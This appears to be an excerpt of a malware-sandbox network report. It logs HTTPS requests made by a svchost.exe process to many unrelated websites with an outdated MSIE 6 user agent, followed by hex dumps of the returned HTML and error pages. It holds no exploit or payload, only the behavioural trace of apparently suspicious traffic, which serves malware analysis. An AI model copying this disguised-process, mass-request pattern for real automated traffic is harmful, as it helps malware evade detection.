                                                                                                                                                                                                                                                                          Data Ascii: 1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15575INData Raw: 34 2e 39 31 2c 31 34 37 2e 37 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 4.91,147.74a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15591INData Raw: 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 35 2c 32 33 2e 39 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38
                                                                                                                                                                                                                                                                          Data Ascii: ="cls-9" d="M550.5,23.91a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15607INData Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 20 69 64 3d 22 74 6f 70 2d 73 6c 69 64 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 73 6d 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d
                                                                                                                                                                                                                                                                          Data Ascii: iv class="container"> <div class="row" id="top-slide"> <div class="col-sm-4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-im


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          75192.168.2.656545.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6470OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6503INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:48 GMT
                                                                                                                                                                                                                                                                          Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 30 Jun 2023 05:41:10 GMT
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Content-Length: 53069
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6503INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6519INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                          Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6535INData Raw: 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 6c 61 6e 64 73 63 61 70 65 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: r.jpg"><source media="(max-width: 767px) and (orientation:landscape)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/file
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6551INData Raw: 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64
                                                                                                                                                                                                                                                                          Data Ascii: srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          76192.168.2.65228185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6571OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6571INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:48 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6571INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          77192.168.2.6600675.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6584OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: ldh.la.gov
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6685INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:48 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 1346
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6685INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          78192.168.2.66559172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6685OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                          Cookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6816INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:49 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 06:07:48 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8pkysSzPdOAWImkvzn7%2FLWxvJYbWYL9qllrOqtiEoIf79Jl7329Q%2BjjTNfsaNQJWXVoSg%2BxJSTdTV6qC7cBIckyNLFnEHouEcGmnTmLHa5BIR0%2B23ZGt08Xwh4%2BtYy98CFSVSPNEAf4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e08cf732bd3-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6817INData Raw: 37 63 61 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 7cad<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6817INData Raw: 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 72 74 5f 73 61 6c 69 65 6e 74 2f 63 75 73 74 6f 6d 2f
                                                                                                                                                                                                                                                                          Data Ascii: uery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/templates/rt_salient/custom/
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6819INData Raw: 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30
                                                                                                                                                                                                                                                                          Data Ascii: a4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/bootstrap.min.js?989da4646a1a0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6820INData Raw: 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 67 61 6e 74 72 79 20 73 69 74 65 20 63 6f 6d 5f 67 61 6e 74 72 79 35 20 76 69
                                                                                                                                                                                                                                                                          Data Ascii: us-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="gantry site com_gantry5 vi
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6822INData Raw: 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: 05-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard "><div class="g-menu-item-cont
